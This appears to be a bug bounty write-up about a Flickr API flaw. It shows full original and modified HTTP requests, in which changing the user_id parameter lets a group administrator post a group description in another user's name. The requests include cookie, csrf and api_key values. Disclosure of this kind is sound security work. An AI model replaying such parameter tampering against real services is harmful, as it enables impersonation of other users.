Spoof an user to create a description of a group in Flickr

Hi guys, I’m now at San Francisco and I’m very happy because I met with a lot of Hackers at HackerOne h1–415. I am very grateful to have participated. Since it’s raining I decided to write this post in the hotel.

I love the Yahoo program, it has a very large scope, it is very pleasant to be able to study the technology and the behavior of its services, sometimes it takes a lot of time to exploit something, however, all sacrifice has its reward

I have decided to look for vulnerabilities in Flickr and well, I had not worked with this website before. Flickr has multiple services, in which you can cross-test between more accounts, fraud tests, authorization problems, etc.

Among so many tests that I did, I came to the group section, where I first created a group:

Group created by user A

After creating this group, I went to create a group description.

Group Description

Now with the administrator user I modified the created description, doing this the following request was generated:

Original Request

POST /services/rest HTTP/1.1 Host: api.flickr.com Connection: close Content-Length: 341 Origin: https://www.flickr.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: https://www.flickr.com/groups/3112603@N20/ Accept-Encoding: gzip, deflate Accept-Language: es-ES,es;q=0.9 Cookie: xb=494601; ffs=138666580-1480; cookie_accid=138666580; cookie_epass=my_cookies; localization=es-us%3Bcl%3Bcl; BX=f5kvta5ud0g9q&b=4&d=lq1Mmb1pYFSvzX1jAve8cwScqQs-&s=lv&i=rsUJjvasshshdhsJ; sa=1518891368%3A138671920%40N05%3A38475100499aa04d205cdff7870c0eb1; cookie_session=cookie flrbp=1518801856-6-b625b3cb6510531eab398458f7289ac17cab92931; flrbrp=1518801856-3664c6a6799b3d9a83842bd2f37d76ff9bd2aa6b7; flrb=15; vp=1349%2C662%2C1%2C17%2Cgroup-pool-preview-view%3A1063%2Csearch-photos-everyone-view%3A1079%2Cphotolist-container%3A1079%2Cprofile-container%3A1079%2Cshowcase-container%3A863; RT=s=1518803429246&u=&r=https%3A//www.flickr.com/groups_create.gne
group_id=3112603%40N20&blast=This%20is%20a%20rule%20with%20user%20A&user_id=138671920%40N05&extras=gimme_blast&viewerNSID=138671920%40N05&method=flickr.groups.addBlast&csrf=1518832271%3Ahfolijlgt08%3A5325f7c116aefd8f69552aaaafbcbec2&api_key=c7043c721fa36090f475fed2d4e92aa3&format=json&hermes=1&hermesClient=1&reqId=f5def5f4&nojsoncallback=1

I thought, What would happen if I modify the value of the variable user_id by the value of another user’s ID ?. Therefore I proceeded to carry out this process:

Modified Request

POST /services/rest HTTP/1.1 Host: api.flickr.com Connection: close Content-Length: 341 Origin: https://www.flickr.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: https://www.flickr.com/groups/3112603@N20/ Accept-Encoding: gzip, deflate Accept-Language: es-ES,es;q=0.9 Cookie: xb=494601; ffs=138666580-1480; cookie_accid=138666580; cookie_epass=my_cookies; localization=es-us%3Bcl%3Bcl; BX=f5kvta5ud0g9q&b=4&d=lq1Mmb1pYFSvzX1jAve8cwScqQs-&s=lv&i=rsUJjvasshshdhsJ; sa=1518891368%3A138671920%40N05%3A38475100499aa04d205cdff7870c0eb1; cookie_session=cookie flrbp=1518801856-6-b625b3cb6510531eab398458f7289ac17cab92931; flrbrp=1518801856-3664c6a6799b3d9a83842bd2f37d76ff9bd2aa6b7; flrb=15; vp=1349%2C662%2C1%2C17%2Cgroup-pool-preview-view%3A1063%2Csearch-photos-everyone-view%3A1079%2Cphotolist-container%3A1079%2Cprofile-container%3A1079%2Cshowcase-container%3A863; RT=s=1518803429246&u=&r=https%3A//www.flickr.com/groups_create.gne
group_id=3112603%40N20&blast=This%20is%20a%20rule%20with%20user%20B&user_id=147120294%40N08&extras=gimme_blast&viewerNSID=138671920%40N05&method=flickr.groups.addBlast&csrf=1518832271%3Ahfolijlgt08%3A5325f7c116aefd8f69552aaaafbcbec2&api_key=c7043c721fa36090f475fed2d4e92aa3&format=json&hermes=1&hermesClient=1&reqId=f5def5f4&nojsoncallback=1

I got

Spoof another user

As you can see, the account of the victim user has been spoofed. (The ID of another user can be obtained in multiple ways, commenting on photos of a user, giving likes to photos, etc.)

The impact of this is that a user could use the name of another user to write content in their group, in this way the confidentiality of the account of the victim user would be affected.

Thanks you

@saamux